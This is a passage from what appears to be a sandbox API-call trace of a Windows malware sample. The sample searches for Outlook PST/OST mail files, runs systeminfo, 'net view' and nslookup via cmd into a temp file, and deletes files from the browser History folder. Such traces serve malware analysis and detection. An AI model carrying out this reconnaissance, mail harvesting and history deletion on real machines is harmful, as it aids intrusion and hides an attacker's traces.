(hMem=0x5ce2010) returned 0x0 [0251.837] LocalFree (hMem=0x5ce87f0) returned 0x0 [0251.837] LocalFree (hMem=0x5ce1f20) returned 0x0 [0251.837] LocalFree (hMem=0x5ce88b0) returned 0x0 [0251.837] LocalFree (hMem=0x5ce8c30) returned 0x0 [0251.837] LocalFree (hMem=0x5ce8950) returned 0x0 [0251.837] LocalFree (hMem=0x5ce1e10) returned 0x0 [0251.837] LocalFree (hMem=0x5ce8710) returned 0x0 [0251.837] LocalFree (hMem=0x5ce1f90) returned 0x0 [0251.837] LocalFree (hMem=0x5ce8750) returned 0x0 [0251.837] LocalFree (hMem=0x5ce1e30) returned 0x0 [0251.837] LocalFree (hMem=0x5ce8810) returned 0x0 [0251.837] LocalFree (hMem=0x5ce20a0) returned 0x0 [0251.838] LocalFree (hMem=0x5ce85b0) returned 0x0 [0251.838] LocalFree (hMem=0x5ce2020) returned 0x0 [0251.838] LocalFree (hMem=0x5ce8890) returned 0x0 [0251.838] LocalFree (hMem=0x5ce1e90) returned 0x0 [0251.838] LocalFree (hMem=0x5ce8630) returned 0x0 [0251.838] LocalFree (hMem=0x5ce2070) returned 0x0 [0251.838] LocalFree (hMem=0x5ce8a10) returned 0x0 [0251.838] LocalFree (hMem=0x5ce1d50) returned 0x0 [0251.838] LocalFree (hMem=0x5ce7450) returned 0x0 [0251.838] LocalFree (hMem=0x5d1ef90) returned 0x0 [0251.838] LocalFree (hMem=0x5ce6fb0) returned 0x0 [0251.838] LocalFree (hMem=0x5ce1d60) returned 0x0 [0251.838] LocalFree (hMem=0x5ce6fd0) returned 0x0 [0251.838] LocalFree (hMem=0x36d4e0) returned 0x0 [0251.838] LocalFree (hMem=0x5ce6d30) returned 0x0 [0251.838] LocalFree (hMem=0x36d620) returned 0x0 [0251.838] LocalFree (hMem=0x5ce7130) returned 0x0 [0251.838] LocalFree (hMem=0x36d420) returned 0x0 [0251.838] LocalFree (hMem=0x5ce7150) returned 0x0 [0251.838] LocalFree (hMem=0x5ce71b0) returned 0x0 [0251.838] LocalFree (hMem=0x5ce7190) returned 0x0 [0251.838] LocalFree (hMem=0x36d4f0) returned 0x0 [0251.838] LocalFree (hMem=0x5ce7290) returned 0x0 [0251.838] LocalFree (hMem=0x36d400) returned 0x0 [0251.838] LocalFree (hMem=0x5ce6d50) returned 0x0 [0251.838] LocalFree (hMem=0x36d590) returned 0x0 [0251.838] LocalFree (hMem=0x5ce6d70) returned 0x0 [0251.838] LocalFree (hMem=0x36d380) returned 0x0 [0251.838] LocalFree (hMem=0x5ce7690) returned 0x0 [0251.838] LocalFree (hMem=0x36d520) returned 0x0 [0251.838] LocalFree (hMem=0x5ce77d0) returned 0x0 [0251.838] LocalFree (hMem=0x36d440) returned 0x0 [0251.838] LocalFree (hMem=0x5ce7b70) returned 0x0 [0251.838] LocalFree (hMem=0x36d650) returned 0x0 [0251.838] LocalFree (hMem=0x5ce7bf0) returned 0x0 [0251.838] LocalFree (hMem=0x36d6c0) returned 0x0 [0251.838] LocalFree (hMem=0x5ce7970) returned 0x0 [0251.838] LocalFree (hMem=0x36d330) returned 0x0 [0251.838] LocalFree (hMem=0x5ce76d0) returned 0x0 [0251.838] LocalFree (hMem=0x36d350) returned 0x0 [0251.838] LocalFree (hMem=0x5ce7c10) returned 0x0 [0251.838] LocalFree (hMem=0x36d390) returned 0x0 [0251.838] LocalFree (hMem=0x5ce76f0) returned 0x0 [0251.839] LocalFree (hMem=0x36d3e0) returned 0x0 [0251.839] LocalFree (hMem=0x5ce7890) returned 0x0 [0251.839] LocalFree (hMem=0x36d3f0) returned 0x0 [0251.839] LocalFree (hMem=0x5ce7710) returned 0x0 [0251.839] LocalFree (hMem=0x36d460) returned 0x0 [0251.839] LocalFree (hMem=0x5ce7770) returned 0x0 [0251.839] LocalFree (hMem=0x3e2710) returned 0x0 [0251.839] LocalFree (hMem=0x5ce77b0) returned 0x0 [0251.839] LocalFree (hMem=0x3e2850) returned 0x0 [0251.839] LocalFree (hMem=0x5ce77f0) returned 0x0 [0251.839] LocalFree (hMem=0x3e2870) returned 0x0 [0251.839] LocalFree (hMem=0x5ce78f0) returned 0x0 [0251.839] LocalFree (hMem=0x3e2760) returned 0x0 [0251.839] LocalFree (hMem=0x5ce7eb0) returned 0x0 [0251.839] LocalFree (hMem=0x3e2880) returned 0x0 [0251.839] LocalFree (hMem=0x5ce7f50) returned 0x0 [0251.839] LocalFree (hMem=0x3e25c0) returned 0x0 [0251.839] LocalFree (hMem=0x5ce7f90) returned 0x0 [0251.839] LocalFree (hMem=0x3e28c0) returned 0x0 [0251.839] LocalFree (hMem=0x5ce8090) returned 0x0 [0251.839] LocalFree (hMem=0x3e25d0) returned 0x0 [0251.839] LocalFree (hMem=0x5ce80b0) returned 0x0 [0251.839] LocalFree (hMem=0x3e2720) returned 0x0 [0251.839] LocalFree (hMem=0x5ce8350) returned 0x0 [0251.839] LocalFree (hMem=0x3e25e0) returned 0x0 [0251.839] LocalFree (hMem=0x5ce80d0) returned 0x0 [0251.839] LocalFree (hMem=0x3e27e0) returned 0x0 [0251.839] LocalFree (hMem=0x5ce8510) returned 0x0 [0251.839] LocalFree (hMem=0x3e26e0) returned 0x0 [0251.839] LocalFree (hMem=0x5ce8130) returned 0x0 [0251.839] LocalFree (hMem=0x3e2640) returned 0x0 [0251.839] LocalFree (hMem=0x5ce83f0) returned 0x0 [0251.839] LocalFree (hMem=0x3e26c0) returned 0x0 [0251.839] LocalFree (hMem=0x5ce8370) returned 0x0 [0251.839] LocalFree (hMem=0x5c229c0) returned 0x0 [0251.839] LocalFree (hMem=0x5ce83d0) returned 0x0 [0251.839] LocalFree (hMem=0x5c22a20) returned 0x0 [0251.839] LocalFree (hMem=0x5ce8410) returned 0x0 [0251.839] LocalFree (hMem=0x5c229f0) returned 0x0 [0251.839] LocalFree (hMem=0x5ce7db0) returned 0x0 [0251.839] LocalFree (hMem=0x5c22810) returned 0x0 [0251.839] LocalFree (hMem=0x5ce7dd0) returned 0x0 [0251.839] LocalFree (hMem=0x5c22af0) returned 0x0 [0251.840] LocalFree (hMem=0x5ce7df0) returned 0x0 [0251.840] LocalFree (hMem=0x5c22b00) returned 0x0 [0251.840] LocalFree (hMem=0x5ce7e10) returned 0x0 [0251.840] LocalFree (hMem=0x5c22b10) returned 0x0 [0251.840] LocalFree (hMem=0x4411c50) returned 0x0 [0251.840] LocalFree (hMem=0x5c228b0) returned 0x0 [0251.840] LocalFree (hMem=0x4411db0) returned 0x0 [0251.840] LocalFree (hMem=0x5c227e0) returned 0x0 [0251.840] LocalFree (hMem=0x4411eb0) returned 0x0 [0251.840] LocalFree (hMem=0x5c22820) returned 0x0 [0251.840] LocalFree (hMem=0x4411d10) returned 0x0 [0251.840] LocalFree (hMem=0x5c228d0) returned 0x0 [0251.840] LocalFree (hMem=0x4411d30) returned 0x0 [0251.840] LocalFree (hMem=0x5c22920) returned 0x0 [0251.840] LocalFree (hMem=0x4411d50) returned 0x0 [0251.840] LocalFree (hMem=0x5c22930) returned 0x0 [0251.840] LocalFree (hMem=0x4411e30) returned 0x0 [0251.840] LocalFree (hMem=0x43aa0e0) returned 0x0 [0251.840] LocalFree (hMem=0x4411e90) returned 0x0 [0251.840] LocalFree (hMem=0x43aa0f0) returned 0x0 [0251.840] LocalFree (hMem=0x4411ed0) returned 0x0 [0251.840] LocalFree (hMem=0x43aa1d0) returned 0x0 [0251.840] LocalFree (hMem=0x4411ef0) returned 0x0 [0251.840] LocalFree (hMem=0x43aa1e0) returned 0x0 [0251.840] LocalFree (hMem=0x44104f0) returned 0x0 [0251.840] LocalFree (hMem=0x43aa2b0) returned 0x0 [0251.840] LocalFree (hMem=0x4410590) returned 0x0 [0251.840] LocalFree (hMem=0x43aa100) returned 0x0 [0251.840] LocalFree (hMem=0x4410650) returned 0x0 [0251.840] LocalFree (hMem=0x43aa210) returned 0x0 [0251.840] LocalFree (hMem=0x44106d0) returned 0x0 [0251.840] LocalFree (hMem=0x43aa220) returned 0x0 [0251.840] LocalFree (hMem=0x4410810) returned 0x0 [0251.840] LocalFree (hMem=0x5be1060) returned 0x0 [0251.840] LocalFree (hMem=0x4410bf0) returned 0x0 [0251.840] LocalFree (hMem=0x5be0f10) returned 0x0 [0251.840] LocalFree (hMem=0x4410c30) returned 0x0 [0251.840] LocalFree (hMem=0x5be11d0) returned 0x0 [0251.840] LocalFree (hMem=0x4410ef0) returned 0x0 [0251.840] LocalFree (hMem=0x5be1110) returned 0x0 [0251.840] LocalFree (hMem=0x4410fb0) returned 0x0 [0251.840] LocalFree (hMem=0x5be1200) returned 0x0 [0251.840] LocalFree (hMem=0x4411090) returned 0x0 [0251.841] LocalFree (hMem=0x5be1230) returned 0x0 [0251.841] LocalFree (hMem=0x44112b0) returned 0x0 [0251.841] LocalFree (hMem=0x5be0fc0) returned 0x0 [0251.841] LocalFree (hMem=0x4410b50) returned 0x0 [0251.841] LocalFree (hMem=0x444c3b0) returned 0x0 [0251.841] LocalFree (hMem=0x44110d0) returned 0x0 [0251.841] LocalFree (hMem=0x444c1e0) returned 0x0 [0251.841] LocalFree (hMem=0x4410f10) returned 0x0 [0251.841] LocalFree (hMem=0x444c290) returned 0x0 [0251.841] LocalFree (hMem=0x4410f90) returned 0x0 [0251.841] LocalFree (hMem=0x3490b0) returned 0x0 [0251.841] LocalFree (hMem=0x4411130) returned 0x0 [0251.841] LocalFree (hMem=0x4434100) returned 0x0 [0251.841] LocalFree (hMem=0x44112f0) returned 0x0 [0251.841] LocalFree (hMem=0x4433df0) returned 0x0 [0251.841] LocalFree (hMem=0x4411150) returned 0x0 [0251.841] LocalFree (hMem=0x4434040) returned 0x0 [0251.841] LocalFree (hMem=0x44118b0) returned 0x0 [0251.841] LocalFree (hMem=0x4433eb0) returned 0x0 [0251.841] LocalFree (hMem=0x4411390) returned 0x0 [0251.841] LocalFree (hMem=0x4433f70) returned 0x0 [0251.841] LocalFree (hMem=0x4411950) returned 0x0 [0251.841] LocalFree (hMem=0x4433f40) returned 0x0 [0251.841] LocalFree (hMem=0x4411630) returned 0x0 [0251.841] LocalFree (hMem=0x4433f90) returned 0x0 [0251.841] LocalFree (hMem=0x4411610) returned 0x0 [0251.841] LocalFree (hMem=0x4433e20) returned 0x0 [0251.841] LocalFree (hMem=0x44114b0) returned 0x0 [0251.841] LocalFree (hMem=0x4433f50) returned 0x0 [0251.841] LocalFree (hMem=0x44118d0) returned 0x0 [0251.841] LocalFree (hMem=0x4433e50) returned 0x0 [0251.841] LocalFree (hMem=0x4411650) returned 0x0 [0251.841] wsprintfA (in: param_1=0x79c8960, param_2="Processing Pst file = %S; fsize = %u;" | out: param_1="Processing Pst file = C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst; fsize = 271360;") returned 103 [0251.841] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0 [0251.841] FindClose (in: hFindFile=0x5c0ee90 | out: hFindFile=0x5c0ee90) returned 1 [0251.842] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0251.842] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.842] PathMatchSpecW (pszFile="pbnJ4kjIVcGhC95IFN.docx", pszSpec="*.pst") returned 0 [0251.842] PathMatchSpecW (pszFile="pbnJ4kjIVcGhC95IFN.docx", pszSpec="*.ost") returned 0 [0251.842] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0251.842] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.842] PathMatchSpecW (pszFile="PmdSRcllqNQ5o.pptx", pszSpec="*.pst") returned 0 [0251.842] PathMatchSpecW (pszFile="PmdSRcllqNQ5o.pptx", pszSpec="*.ost") returned 0 [0251.842] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0251.842] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.842] PathMatchSpecW (pszFile="rEWywO8ZBUvR X.pdf", pszSpec="*.pst") returned 0 [0251.842] PathMatchSpecW (pszFile="rEWywO8ZBUvR X.pdf", pszSpec="*.ost") returned 0 [0251.842] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0251.842] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.842] PathMatchSpecW (pszFile="RRkZSizQ NwhVbG4kl0.pptx", pszSpec="*.pst") returned 0 [0251.842] PathMatchSpecW (pszFile="RRkZSizQ NwhVbG4kl0.pptx", pszSpec="*.ost") returned 0 [0251.842] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0251.842] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.842] PathMatchSpecW (pszFile="t8Yf PNsNP.ots", pszSpec="*.pst") returned 0 [0251.842] PathMatchSpecW (pszFile="t8Yf PNsNP.ots", pszSpec="*.ost") returned 0 [0251.842] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0251.842] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.842] PathMatchSpecW (pszFile="Vx2NdQYZCCEE6j.docx", pszSpec="*.pst") returned 0 [0251.842] PathMatchSpecW (pszFile="Vx2NdQYZCCEE6j.docx", pszSpec="*.ost") returned 0 [0251.842] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0251.842] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.842] PathMatchSpecW (pszFile="yezi i.pptx", pszSpec="*.pst") returned 0 [0251.842] PathMatchSpecW (pszFile="yezi i.pptx", pszSpec="*.ost") returned 0 [0251.843] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 0 [0251.843] FindClose (in: hFindFile=0x5c0feb0 | out: hFindFile=0x5c0feb0) returned 1 [0251.843] IStream:RemoteSeek (in: This=0xd1ee050, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0251.843] IStream:Stat (in: This=0xd1ee050, pstatstg=0x235f720, grfStatFlag=0x1 | out: pstatstg=0x235f720) returned 0x0 [0251.843] IUnknown:Release (This=0xd1ee050) returned 0x0 [0251.843] GetProcAddress (hModule=0x7ff977b60000, lpProcName="CoUninitialize") returned 0x7ff9778a2380 [0251.843] CoUninitialize () Thread: id = 106 os_tid = 0x700 [0249.386] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x26 [0249.386] GetTempPathA (in: nBufferLength=0x26, lpBuffer=0x7aae4e0 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\") returned 0x25 [0249.386] GetTickCount () returned 0x24e35 [0249.386] GetTempFileNameA (in: lpPathName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0x11519e9, lpTempFileName=0x7aae4e0 | out: lpTempFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.tmp" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\19e9.tmp")) returned 0x19e9 [0249.387] GetProcAddress (hModule=0x7ff977360000, lpProcName="PathFindExtensionA") returned 0x7ff977374800 [0249.387] PathFindExtensionA (pszPath="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.tmp") returned=".tmp" [0249.387] lstrcpyA (in: lpString1=0x7aae509, lpString2=".bin" | out: lpString1=".bin") returned=".bin" [0249.387] lstrlenA (lpString="systeminfo.exe ") returned 15 [0249.387] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin") returned 45 [0249.387] wsprintfA (in: param_1=0x79b4190, param_2="cmd /C \"%s> %s1\"" | out: param_1="cmd /C \"systeminfo.exe > C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"") returned 72 [0249.387] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="cmd /C \"systeminfo.exe > C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0xc000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x23df7e0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x23df7b0 | out: lpCommandLine="cmd /C \"systeminfo.exe > C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"", lpProcessInformation=0x23df7b0*(hProcess=0x95c, hThread=0x934, dwProcessId=0xbf0, dwThreadId=0x9c4)) returned 1 [0251.248] WaitForMultipleObjects (nCount=0x2, lpHandles=0x23df7c8*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0263.083] GetExitCodeProcess (in: hProcess=0x95c, lpExitCode=0x23df870 | out: lpExitCode=0x23df870*=0x0) returned 1 [0263.083] CloseHandle (hObject=0x934) returned 1 [0263.083] CloseHandle (hObject=0x95c) returned 1 [0263.083] wsprintfA (in: param_1=0x79b4190, param_2="cmd /C \"%s> %s1\"" | out: param_1="cmd /C \"echo -------- >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"") returned 72 [0263.083] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="cmd /C \"echo -------- >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0xc000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x23df7e0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x23df7b0 | out: lpCommandLine="cmd /C \"echo -------- >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"", lpProcessInformation=0x23df7b0*(hProcess=0x934, hThread=0x95c, dwProcessId=0x198, dwThreadId=0xb40)) returned 1 [0263.090] WaitForMultipleObjects (nCount=0x2, lpHandles=0x23df7c8*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0263.334] GetExitCodeProcess (in: hProcess=0x934, lpExitCode=0x23df870 | out: lpExitCode=0x23df870*=0x0) returned 1 [0263.334] CloseHandle (hObject=0x95c) returned 1 [0263.334] CloseHandle (hObject=0x934) returned 1 [0263.334] lstrlenA (lpString="net view >") returned 10 [0263.334] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin") returned 45 [0263.334] wsprintfA (in: param_1=0x7aae530, param_2="cmd /C \"%s> %s1\"" | out: param_1="cmd /C \"net view >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"") returned 67 [0263.334] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="cmd /C \"net view >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0xc000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x23df7e0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x23df7b0 | out: lpCommandLine="cmd /C \"net view >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"", lpProcessInformation=0x23df7b0*(hProcess=0x95c, hThread=0x934, dwProcessId=0x978, dwThreadId=0xb10)) returned 1 [0263.342] WaitForMultipleObjects (nCount=0x2, lpHandles=0x23df7c8*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0276.088] GetExitCodeProcess (in: hProcess=0x95c, lpExitCode=0x23df870 | out: lpExitCode=0x23df870*=0x2) returned 1 [0276.089] CloseHandle (hObject=0x934) returned 1 [0276.089] CloseHandle (hObject=0x95c) returned 1 [0276.089] wsprintfA (in: param_1=0x7aae530, param_2="cmd /C \"%s> %s1\"" | out: param_1="cmd /C \"echo -------- >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"") returned 72 [0276.089] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="cmd /C \"echo -------- >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0xc000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x23df7e0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x23df7b0 | out: lpCommandLine="cmd /C \"echo -------- >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"", lpProcessInformation=0x23df7b0*(hProcess=0x934, hThread=0x95c, dwProcessId=0x86c, dwThreadId=0x53c)) returned 1 [0276.098] WaitForMultipleObjects (nCount=0x2, lpHandles=0x23df7c8*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0276.394] GetExitCodeProcess (in: hProcess=0x934, lpExitCode=0x23df870 | out: lpExitCode=0x23df870*=0x0) returned 1 [0276.394] CloseHandle (hObject=0x95c) returned 1 [0276.394] CloseHandle (hObject=0x934) returned 1 [0276.394] lstrlenA (lpString="nslookup 127.0.0.1 >") returned 20 [0276.394] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin") returned 45 [0276.394] wsprintfA (in: param_1=0x79b4190, param_2="cmd /C \"%s> %s1\"" | out: param_1="cmd /C \"nslookup 127.0.0.1 >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"") returned 77 [0276.394] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="cmd /C \"nslookup 127.0.0.1 >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0xc000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x23df7e0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x23df7b0 | out: lpCommandLine="cmd /C \"nslookup 127.0.0.1 >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"", lpProcessInformation=0x23df7b0*(hProcess=0x95c, hThread=0x934, dwProcessId=0x420, dwThreadId=0x3a0)) returned 1 [0276.405] WaitForMultipleObjects (nCount=0x2, lpHandles=0x23df7c8*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0276.977] GetExitCodeProcess (in: hProcess=0x95c, lpExitCode=0x23df870 | out: lpExitCode=0x23df870*=0x0) returned 1 [0276.977] CloseHandle (hObject=0x934) returned 1 [0276.977] CloseHandle (hObject=0x95c) returned 1 [0276.977] wsprintfA (in: param_1=0x79b4190, param_2="cmd /C \"%s> %s1\"" | out: param_1="cmd /C \"echo -------- >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"") returned 72 [0276.978] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="cmd /C \"echo -------- >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0xc000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x23df7e0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x23df7b0 | out: lpCommandLine="cmd /C \"echo -------- >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"", lpProcessInformation=0x23df7b0*(hProcess=0x934, hThread=0x95c, dwProcessId=0xa1c, dwThreadId=0xbb0)) returned 1 [0276.989] WaitForMultipleObjects (nCount=0x2, lpHandles=0x23df7c8*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) Thread: id = 107 os_tid = 0x38c [0249.388] SHGetFolderPathW (in: hwnd=0x0, csidl=34, hToken=0x0, dwFlags=0x0, pszPath=0x7aaeab0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x0 [0249.388] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned 61 [0249.388] PathCombineW (in: pszDest=0x7aae530, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\*.*" [0249.388] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\*.*", lpFindFileData=0x7aaeee0 | out: lpFindFileData=0x7aaeee0) returned 0x4405510 [0249.388] FindNextFileW (in: hFindFile=0x4405510, lpFindFileData=0x7aaeee0 | out: lpFindFileData=0x7aaeee0) returned 1 [0249.388] FindNextFileW (in: hFindFile=0x4405510, lpFindFileData=0x7aaeee0 | out: lpFindFileData=0x7aaeee0) returned 1 [0249.388] lstrlenW (lpString="desktop.ini") returned 11 [0249.388] PathCombineW (in: pszDest=0x7aaecd0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History", pszFile="desktop.ini" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini" [0249.388] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\history\\desktop.ini")) returned 1 [0249.389] FindNextFileW (in: hFindFile=0x4405510, lpFindFileData=0x7aaeee0 | out: lpFindFileData=0x7aaeee0) returned 1 [0249.389] lstrlenW (lpString="History.IE5") returned 11 [0249.389] PathCombineW (in: pszDest=0x7aaecd0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History", pszFile="History.IE5" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" [0249.389] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 73 [0249.389] PathCombineW (in: pszDest=0x7aae5c0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\*.*" [0249.389] FindFirstFileW (in: 